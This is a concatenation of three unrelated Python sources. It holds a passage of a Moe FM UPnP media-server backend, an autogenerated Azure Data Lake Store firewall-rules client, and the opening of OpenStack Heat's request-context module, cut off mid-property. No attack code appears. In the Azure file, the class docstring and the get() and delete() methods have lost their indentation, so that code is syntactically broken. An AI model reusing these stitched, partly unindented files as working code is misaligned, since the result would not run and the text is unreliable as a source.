        return ReverseProxyUriResource.render(self, request)
class MoeFmTrack(BackendItem):
    """A single Moe FM track, exposed as a UPnP/DIDL-Lite MusicTrack."""
    logCategory = "moefm"
    # Monotonically increasing serial; keeps playlist ordering stable.
    next_sn = 0
    def __init__(self, item_data, container):
        BackendItem.__init__(self)
        self.item_data = item_data
        self.container = container
        self.sub_id = item_data["sub_id"]
        self.storage_id = "track-%s$%s" % (self.sub_id, container.get_id())
        self.__class__.next_sn += 1
        self.sort_key = self.__class__.next_sn
        # Track numbers are embedded in titles shaped like "song.<n> ...".
        number_match = re.match(
            r"^song\.(\d+)\s+.*$",
            _htmlparser.unescape(item_data["title"]),
            re.I,
        )
        track_number = number_match.group(1) if number_match else None
        display_title = _htmlparser.unescape(item_data["sub_title"])
        self.name = display_title
        self.title = display_title
        self.originalTrackNumber = track_number
        self.artist = _htmlparser.unescape(item_data["artist"])
        self.album = _htmlparser.unescape(item_data["wiki_title"])
        self.cover = item_data["cover"]["large"]
        self.duration = item_data["stream_time"]
        self.duration_seconds = int(item_data["stream_length"])
        if not re.match(r"^\d{2}:\d{2}:\d{2}(?:\.\d+)?", self.duration):
            self.duration = "0:" + self.duration # Add hour part
        self.mimetype = "audio/mpeg"
        self.item = None
    def get_id(self):
        """Return the UPnP storage id of this track."""
        return self.storage_id
    def get_item(self):
        """Lazily build (once) and return the DIDL-Lite MusicTrack."""
        if self.item is None:
            upnp_id = self.get_id()
            upnp_parent_id = self.parent.get_id()
            self.debug("get_item %s %s %s", upnp_id, upnp_parent_id, self.name)
            track = DIDLLite.MusicTrack(upnp_id, upnp_parent_id, self.name)
            track.restricted = True
            track.name = self.name
            track.originalTrackNumber = self.originalTrackNumber
            track.title = self.title
            track.artist = self.artist
            track.album = self.album
            track.albumArtURI = self.cover
            track.duration = self.duration
            # Serve the stream through our own proxy resource.
            proxied_url = ("%s%s" % (self.store.urlbase, self.get_id())).encode("utf-8")
            self.url = proxied_url
            self.location = MoeFmProxyStream(self.item_data["url"], self)
            protocol = "http-get"
            resource = Resource(
                proxied_url,
                ("%s:*:%s:*" % (protocol, self.mimetype)).encode("utf-8")
            )
            resource.size = self.item_data["file_size"] * 1024
            resource.duration = self.duration
            track.res.append(resource)
            self.item = track
        return self.item
    def get_url(self):
        """Return the proxied stream URL (populated by get_item)."""
        return self.url
class MoeFmTrackContainer(Container):
    """A playlist container whose children are MoeFmTrack items fetched
    lazily from the Moe FM playlist API.

    get_item()/get_children() return Deferreds that re-enter themselves
    after load_tracks() completes, so callers transparently trigger the
    first fetch.
    """
    logCategory = "moefm_track_container"
    ContainerClass = DIDLLite.PlaylistContainer
    # Subclasses may pin a fixed storage id (see MoeFmRandomPlaylist).
    preferred_id = None
    def __init__(self, store, parent, title, api_params=None):
        super(MoeFmTrackContainer, self).__init__(parent, title)
        # Py2-style comparator: order children by their arrival serial.
        self.sorting_method = lambda x, y: cmp(x.sort_key, y.sort_key)
        self.store = store
        self.api_params = api_params if api_params is not None else {}
        self.loaded = False
        if self.preferred_id:
            self.storage_id = self.preferred_id
            # If the preferred id is already taken, disambiguate it with
            # the parent's id.
            if store.get_by_id(self.storage_id):
                self.storage_id += "$" + parent.get_id()
    def get_item(self):
        # Not loaded yet: fetch first, then re-invoke ourselves.
        if not self.loaded:
            return self.load_tracks().addCallback(lambda _: self.get_item())
        if self.item is None:
            self.item = self.ContainerClass(
                self.storage_id, self.parent_id, self.name
            )
            self.item.childCount = self.get_child_count()
        return self.item
    def get_children(self, *args, **kwargs):
        # Same lazy-load dance as get_item().
        if not self.loaded:
            return self.load_tracks().addCallback(
                lambda _: self.get_children(*args, **kwargs)
            )
        return super(MoeFmTrackContainer, self).get_children(*args, **kwargs)
    def get_api_params(self):
        # Overridden by subclasses to add e.g. paging parameters.
        return self.api_params
    def on_got_response(self, resp_container):
        """Parse one playlist API response and append the new tracks."""
        self.info("Got response")
        resp = resp_container["response"]
        self.debug("Information: %r", resp["information"])
        if resp["information"]["has_error"]:
            self.error("Got error response: %s" % resp)
            return
        items = []
        # Deduplicate against the tracks we already hold, by sub_id.
        existing_ids = set(x.sub_id for x in self.children)
        for item_data in resp["playlist"]:
            item = MoeFmTrack(item_data, self)
            if item.sub_id in existing_ids:
                continue
            items.append(item)
            self.add_child(item)
        self.on_update_completed()
        self.loaded = True
        return items
    def on_got_error(self, error):
        # Log, then propagate the failure down the errback chain.
        self.warning("Unable to retrieve tracks: %s", error)
        return error
    def load_tracks(self):
        """Fire one playlist API request; returns a Deferred of new items."""
        params = {"perpage": settings.get("tracks_per_request", 30)}
        params.update(self.get_api_params())
        d = api.moefm.get("/listen/playlist?api=json", params)
        return d.addCallbacks(self.on_got_response, self.on_got_error)
    def on_update_completed(self):
        # Bump our UPnP update id and notify the store so it can publish
        # the change to connected control points.
        self.update_id += 1
        self.store.on_update_completed(self)
    def on_item_play(self, item):
        # Hook for subclasses; called when a child starts streaming.
        pass
class MoeFmMultiPageTrackContainer(MoeFmTrackContainer):
    """Track container that walks the paged playlist API, fetching page
    after page for as long as should_load_next_page allows."""
    def __init__(self, *args, **kwargs):
        super(MoeFmMultiPageTrackContainer, self).__init__(*args, **kwargs)
        self.current_page = 1
    @property
    def should_load_next_page(self):
        # Base behaviour is to keep paging; subclasses impose a stop rule.
        return True
    def load_tracks(self):
        deferred = super(MoeFmMultiPageTrackContainer, self).load_tracks()
        def advance(items):
            # An empty page means the listing is exhausted.
            if not items:
                return items
            self.current_page += 1
            if not self.should_load_next_page:
                return items
            # Recurse into the next page, chaining its items onto ours.
            return self.load_tracks().addCallback(
                lambda more: itertools.chain(more, items)
            )
        return deferred.addCallback(advance)
    def get_api_params(self):
        params = super(MoeFmMultiPageTrackContainer, self).get_api_params()
        params["page"] = self.current_page
        return params
class MoeFmRandomPlaylist(MoeFmMultiPageTrackContainer):
    """The "Magic" shuffle playlist.

    Keeps at least ``min_tracks_in_playlist`` tracks queued; played tracks
    are removed from the container (but stay resolvable in the store) and
    the pool is topped up on the next load.
    """
    preferred_id = "magic"
    def __init__(self, store, parent):
        super(MoeFmRandomPlaylist, self).__init__(store, parent, "Magic")
    def remove_child(self, child, external_id=None, update=True):
        # Drop the child from our listing only; it is deliberately NOT
        # removed from the store, so a renderer that is still streaming the
        # item can keep resolving it.
        try:
            self.children.remove(child)
            # We'd like the item to be accessible even after removing it
            # self.store.remove_item(child)
        except ValueError:
            # Child wasn't in our list; nothing to do.
            pass
        else:
            if update:
                self.update_id += 1
    @property
    def need_more_tracks(self):
        # True while we hold fewer tracks than the configured minimum.
        current_count = self.get_child_count()
        return current_count < settings.get("min_tracks_in_playlist", 120)
    @property
    def should_load_next_page(self):
        return self.need_more_tracks
    @property
    def loaded(self):
        # 'loaded' is derived state here: the playlist counts as loaded
        # exactly when it already holds enough tracks.
        return not self.need_more_tracks
    # The base class assigns "self.loaded = ..."; give the property a
    # no-op setter so those writes are silently ignored.
    loaded = loaded.setter(lambda self, value: None)
    def on_item_play(self, item):
        # A played track leaves the queue immediately and the change is
        # published to control points.
        self.remove_child(item)
        self.on_update_completed()
class MoeFmPlaylistStore(AbstractBackendStore):
    """Coherence MediaServer backend exposing Moe FM playlists."""
    logCategory = "moefm"
    name = "Moe FM"
    implements = ["MediaServer"]
    # Map Windows Media Connect's "music" container (16) onto our tree.
    wmc_mapping = {"16": 1000}
    def __init__(self, server, **kwargs):
        AbstractBackendStore.__init__(self, server, **kwargs)
        self.init_completed()
    def __repr__(self):
        return self.__class__.__name__
    def append_item(self, item, storage_id=None):
        # Prefer the item's own id; fall back to a generated numeric id.
        if storage_id is None:
            storage_id = item.get_id()
        if storage_id is None:
            storage_id = self.getnextID()
        storage_id = str(storage_id)
        return super(MoeFmPlaylistStore, self).append_item(item, storage_id)
    def get_by_id(self, id):
        self.info("get_by_id: %r", id)
        # Ids may arrive suffixed with "@<...>" or ".<...>"; strip both to
        # recover the bare storage id.  (basestring: Python 2 module.)
        if isinstance(id, basestring):
            id = id.split("@", 1)
            id = id[0].split(".")[0]
        return self.store.get(str(id))
    def upnp_init(self):
        """Called by Coherence once the UPnP machinery is up: advertise our
        protocol info and build the container tree."""
        self.current_connection_id = None
        self.server.connection_manager_server.set_variable(
            0,
            "SourceProtocolInfo",
            ["http-get:*:audio/mpeg:*"],
            default=True,
        )
        root_item = Container(None, "Moe FM")
        self.root_item = root_item
        self.set_root_item(root_item)
        root_item.add_child(MoeFmRandomPlaylist(self, root_item))
        fav_tracks = MoeFmMultiPageTrackContainer(
            self, root_item, "Favorite tracks", api_params={"fav": "song"}
        )
        fav_tracks.storage_id = "fav-tracks"
        root_item.add_child(fav_tracks)
    def on_update_completed(self, container):
        # Publish both the system-wide and per-container update counters;
        # failures here are logged but never fatal.
        self.update_id += 1
        try:
            self.server.content_directory_server.set_variable(
                0, "SystemUpdateID", self.update_id,
            )
            value = (container.get_id(), container.get_update_id())
            self.info("on_update_completed %s %s", self.update_id, value)
            self.server.content_directory_server.set_variable(
                0, "ContainerUpdateIDs", value,
            )
        except Exception as e:
            self.warning("%r", e)
if __name__ == '__main__':
    from twisted.internet import reactor
    def start_backend():
        # Register this store as a Coherence plugin and boot a server
        # configured to use it exclusively.
        from coherence.base import Coherence, Plugins
        Plugins().set("MoeFmPlaylistStore", MoeFmPlaylistStore)
        config = dict(settings.get("coherence_config", {}))
        config["plugin"] = [{"backend": "MoeFmPlaylistStore"}]
        Coherence(config)
    reactor.callWhenRunning(start_backend)
    reactor.run()
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
    # pylint: disable=unused-import,ungrouped-imports
    from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
    T = TypeVar('T')
    # Callback type accepted via the 'cls' kwarg on every operation: it
    # receives the raw pipeline response, the deserialized model, and the
    # response headers dict.
    ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class FirewallRulesOperations(object):
"""FirewallRulesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.datalake.store.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
    def __init__(self, client, config, serializer, deserializer):
        # Pipeline client used to build and send HTTP requests.
        self._client = client
        self._serialize = serializer
        self._deserialize = deserializer
        # Service client configuration (holds e.g. subscription_id).
        self._config = config
    def list_by_account(
        self,
        resource_group_name, # type: str
        account_name, # type: str
        **kwargs # type: Any
    ):
        # type: (...) -> Iterable["_models.FirewallRuleListResult"]
        """Lists the Data Lake Store firewall rules within the specified Data Lake Store account.
        :param resource_group_name: The name of the Azure resource group.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Store account.
        :type account_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either FirewallRuleListResult or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.datalake.store.models.FirewallRuleListResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.FirewallRuleListResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-11-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the GET request for either the first page (from the URL
            # template) or a continuation page (from the service nextLink).
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # Construct URL
                url = self.list_by_account.metadata['url']  # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                    'accountName': self._serialize.url("account_name", account_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # The nextLink already carries all query parameters.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        def extract_data(pipeline_response):
            # Deserialize one page and return (next page link, items).
            deserialized = self._deserialize('FirewallRuleListResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)
        def get_next(next_link=None):
            # Fetch one page, mapping HTTP errors to typed exceptions.
            request = prepare_request(next_link)
            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return ItemPaged(
            get_next, extract_data
        )
    list_by_account.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules'}  # type: ignore
    def create_or_update(
        self,
        resource_group_name, # type: str
        account_name, # type: str
        firewall_rule_name, # type: str
        parameters, # type: "_models.CreateOrUpdateFirewallRuleParameters"
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.FirewallRule"
        """Creates or updates the specified firewall rule. During update, the firewall rule with the
        specified name will be replaced with this new firewall rule.
        :param resource_group_name: The name of the Azure resource group.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Store account.
        :type account_name: str
        :param firewall_rule_name: The name of the firewall rule to create or update.
        :type firewall_rule_name: str
        :param parameters: Parameters supplied to create or update the firewall rule.
        :type parameters: ~azure.mgmt.datalake.store.models.CreateOrUpdateFirewallRuleParameters
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: FirewallRule, or the result of cls(response)
        :rtype: ~azure.mgmt.datalake.store.models.FirewallRule
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.FirewallRule"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-11-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.create_or_update.metadata['url']  # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'accountName': self._serialize.url("account_name", account_name, 'str'),
            'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the model into the PUT body and send the request.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'CreateOrUpdateFirewallRuleParameters')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('FirewallRule', pipeline_response)
        if cls:
            # Give the caller's hook the raw response, model, and headers.
            return cls(pipeline_response, deserialized, {})
        return deserialized
    create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'}  # type: ignore
def get(
self,
resource_group_name, # type: str
account_name, # type: str
firewall_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FirewallRule"
"""Gets the specified Data Lake Store firewall rule.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:param firewall_rule_name: The name of the firewall rule to retrieve.
:type firewall_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FirewallRule, or the result of cls(response)
:rtype: ~azure.mgmt.datalake.store.models.FirewallRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FirewallRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
    def update(
        self,
        resource_group_name, # type: str
        account_name, # type: str
        firewall_rule_name, # type: str
        parameters=None, # type: Optional["_models.UpdateFirewallRuleParameters"]
        **kwargs # type: Any
    ):
        # type: (...) -> "_models.FirewallRule"
        """Updates the specified firewall rule.

        Issues a PATCH against the firewall-rule resource; a request body is
        sent only when ``parameters`` is provided.

        :param resource_group_name: The name of the Azure resource group.
        :type resource_group_name: str
        :param account_name: The name of the Data Lake Store account.
        :type account_name: str
        :param firewall_rule_name: The name of the firewall rule to update.
        :type firewall_rule_name: str
        :param parameters: Parameters supplied to update the firewall rule.
        :type parameters: ~azure.mgmt.datalake.store.models.UpdateFirewallRuleParameters
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: FirewallRule, or the result of cls(response)
        :rtype: ~azure.mgmt.datalake.store.models.FirewallRule
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.FirewallRule"]
        # Default mapping of HTTP status codes to azure-core exceptions;
        # callers may extend/override it via the 'error_map' kwarg.
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2016-11-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.update.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'accountName': self._serialize.url("account_name", account_name, 'str'),
            'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        # Serialize the optional body; an absent 'parameters' sends no content.
        body_content_kwargs = {} # type: Dict[str, Any]
        if parameters is not None:
            body_content = self._serialize.body(parameters, 'UpdateFirewallRuleParameters')
        else:
            body_content = None
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # 200 is the only documented success status for this operation.
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('FirewallRule', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
def delete(
self,
resource_group_name, # type: str
account_name, # type: str
firewall_rule_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes the specified firewall rule from the specified Data Lake Store account.
:param resource_group_name: The name of the Azure resource group.
:type resource_group_name: str
:param account_name: The name of the Data Lake Store account.
:type account_name: str
:param firewall_rule_name: The name of the firewall rule to delete.
:type firewall_rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-11-01"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'firewallRuleName': self._serialize.url("firewall_rule_name", firewall_rule_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataLakeStore/accounts/{accountName}/firewallRules/{firewallRuleName}'} # type: ignore
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from keystoneclient import access
from keystoneclient import auth
from keystoneclient.auth.identity import access as access_plugin
from keystoneclient.auth.identity import v3
from keystoneclient.auth import token_endpoint
from oslo_config import cfg
from oslo_context import context
from oslo_log import log as logging
import oslo_messaging
from oslo_middleware import request_id as oslo_request_id
from oslo_utils import importutils
import six
from heat.common import endpoint_utils
from heat.common import exception
from heat.common.i18n import _LE, _LW
from heat.common import policy
from heat.common import wsgi
from heat.db import api as db_api
from heat.engine import clients
# Module-level logger.
LOG = logging.getLogger(__name__)
# Config group that holds the trustee credentials for trust-scoped auth.
TRUSTEE_CONF_GROUP = 'trustee'
# Register the keystoneclient auth-plugin options under the trustee group so
# auth.load_from_conf_options() can read them later.
auth.register_conf_options(cfg.CONF, TRUSTEE_CONF_GROUP)
class RequestContext(context.RequestContext):
    """Stores information about the security context.

    Under the security context the user accesses the system, as well as
    additional request information.
    """

    def __init__(self, auth_token=None, username=None, password=None,
                 aws_creds=None, tenant=None, user_id=None,
                 tenant_id=None, auth_url=None, roles=None, is_admin=None,
                 read_only=False, show_deleted=False,
                 overwrite=True, trust_id=None, trustor_user_id=None,
                 request_id=None, auth_token_info=None, region_name=None,
                 auth_plugin=None, trusts_auth_plugin=None, **kwargs):
        """Initialisation of the request context.

        :param overwrite: Set to False to ensure that the greenthread local
            copy of the index is not overwritten.
        :param kwargs: Extra arguments that might be present, but we ignore
            because they possibly came in from older rpc messages.
        """
        super(RequestContext, self).__init__(auth_token=auth_token,
                                             user=username, tenant=tenant,
                                             is_admin=is_admin,
                                             read_only=read_only,
                                             show_deleted=show_deleted,
                                             request_id=request_id)
        self.username = username
        self.user_id = user_id
        self.password = password
        self.region_name = region_name
        self.aws_creds = aws_creds
        self.tenant_id = tenant_id
        self.auth_token_info = auth_token_info
        self.auth_url = auth_url
        self.roles = roles or []
        # Created lazily via the session/clients properties below.
        self._session = None
        self._clients = None
        self.trust_id = trust_id
        self.trustor_user_id = trustor_user_id
        self.policy = policy.Enforcer()
        self._auth_plugin = auth_plugin
        self._trusts_auth_plugin = trusts_auth_plugin
        # When the caller did not state admin-ness explicitly, derive it
        # from the policy rules for this context.
        if is_admin is None:
            self.is_admin = self.policy.check_is_admin(self)
        else:
            self.is_admin = is_admin

    @property
    def session(self):
        """Lazily created database session for this context."""
        if self._session is None:
            self._session = db_api.get_session()
        return self._session

    @property
    def clients(self):
        """Lazily created collection of OpenStack clients for this context."""
        if self._clients is None:
            self._clients = clients.Clients(self)
        return self._clients

    def to_dict(self):
        """Serialize the context, e.g. for RPC transport or logging."""
        user_idt = '{user} {tenant}'.format(user=self.user_id or '-',
                                            tenant=self.tenant_id or '-')
        return {'auth_token': self.auth_token,
                'username': self.username,
                'user_id': self.user_id,
                'password': self.password,
                'aws_creds': self.aws_creds,
                'tenant': self.tenant,
                'tenant_id': self.tenant_id,
                'trust_id': self.trust_id,
                'trustor_user_id': self.trustor_user_id,
                'auth_token_info': self.auth_token_info,
                'auth_url': self.auth_url,
                'roles': self.roles,
                'is_admin': self.is_admin,
                'user': self.user,
                'request_id': self.request_id,
                'show_deleted': self.show_deleted,
                'region_name': self.region_name,
                'user_identity': user_idt}

    @classmethod
    def from_dict(cls, values):
        """Re-create a context from the output of :meth:`to_dict`."""
        return cls(**values)

    @property
    def keystone_v3_endpoint(self):
        """Return the keystone v3 API endpoint for this context.

        Prefers the auth_url supplied with the request (upgraded from
        v2.0 to v3 when necessary), falling back to the configured
        auth_uri.
        """
        if self.auth_url:
            return self.auth_url.replace('v2.0', 'v3')
        else:
            auth_uri = endpoint_utils.get_auth_uri()
            if auth_uri:
                return auth_uri
            else:
                # Wrapped in _LE for consistency with the other error
                # logs in this module.
                LOG.error(_LE('Keystone API endpoint not provided. Set '
                              'auth_uri in section [clients_keystone] '
                              'of the configuration file.'))
                raise exception.AuthorizationFailure()

    @property
    def trusts_auth_plugin(self):
        """Auth plugin used for trust-scoped authentication.

        Prefers an explicitly supplied plugin, then the [trustee] config
        options, and finally (deprecated) the keystone_authtoken admin
        credentials.
        """
        if self._trusts_auth_plugin:
            return self._trusts_auth_plugin
        self._trusts_auth_plugin = auth.load_from_conf_options(
            cfg.CONF, TRUSTEE_CONF_GROUP, trust_id=self.trust_id)
        if self._trusts_auth_plugin:
            return self._trusts_auth_plugin
        # LOG.warn is a deprecated alias of LOG.warning; also let the
        # logging machinery interpolate the argument lazily.
        LOG.warning(_LW('Using the keystone_authtoken user as the heat '
                        'trustee user directly is deprecated. Please add the '
                        'trustee credentials you need to the %s section of '
                        'your heat.conf file.'), TRUSTEE_CONF_GROUP)
        cfg.CONF.import_group('keystone_authtoken',
                              'keystonemiddleware.auth_token')
        self._trusts_auth_plugin = v3.Password(
            username=cfg.CONF.keystone_authtoken.admin_user,
            password=cfg.CONF.keystone_authtoken.admin_password,
            user_domain_id='default',
            auth_url=self.keystone_v3_endpoint,
            trust_id=self.trust_id)
        return self._trusts_auth_plugin

    def _create_auth_plugin(self):
        """Build an auth plugin from whatever credentials are available."""
        if self.auth_token_info:
            # A service catalog came with the token; reuse it directly.
            auth_ref = access.AccessInfo.factory(body=self.auth_token_info,
                                                 auth_token=self.auth_token)
            return access_plugin.AccessInfoPlugin(
                auth_url=self.keystone_v3_endpoint,
                auth_ref=auth_ref)
        if self.auth_token:
            # FIXME(jamielennox): This is broken but consistent. If you
            # only have a token but don't load a service catalog then
            # url_for wont work. Stub with the keystone endpoint so at
            # least it might be right.
            return token_endpoint.Token(endpoint=self.keystone_v3_endpoint,
                                        token=self.auth_token)
        if self.password:
            return v3.Password(username=self.username,
                               password=self.password,
                               project_id=self.tenant_id,
                               user_domain_id='default',
                               auth_url=self.keystone_v3_endpoint)
        LOG.error(_LE("Keystone v3 API connection failed, no password "
                      "trust or auth_token!"))
        raise exception.AuthorizationFailure()

    @property
    def auth_plugin(self):
